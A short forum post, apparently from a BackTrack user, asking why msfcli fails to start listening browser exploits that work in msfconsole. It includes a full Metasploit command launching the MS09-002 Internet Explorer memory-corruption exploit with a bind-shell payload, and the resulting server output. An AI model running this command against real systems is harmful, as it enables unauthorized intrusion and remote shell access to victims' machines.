msfcli cannot load "listening" exploit?
This seems more of a metasploit issue than a bt4b issue, but thought I should post here anyway.
I am running bt4b installed in VMWare (note, I am not using the proper VMWare image becuase my version of vmware workstation is out of date).
Trying to launch any exploit via msfcli that uses a "listening" exploit, (I.E the majority of client-side browser exploits), msfcli just fails as below (no errors), however running the same exploit with same parameters in msfconsole works and the exploit is launched and ready for a connection.
root@bt:/pentest/exploits/framework3# ./msfcli exploit/windows/browser/ms09_002_memory_corruption SRVPORT=80 URIPATH=test PAYLOAD=windows/shell/bind_tcp LPORT=4444 E
msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:81/test
[*] Local IP: http://10.0.0.232:81/test
[*] Server started.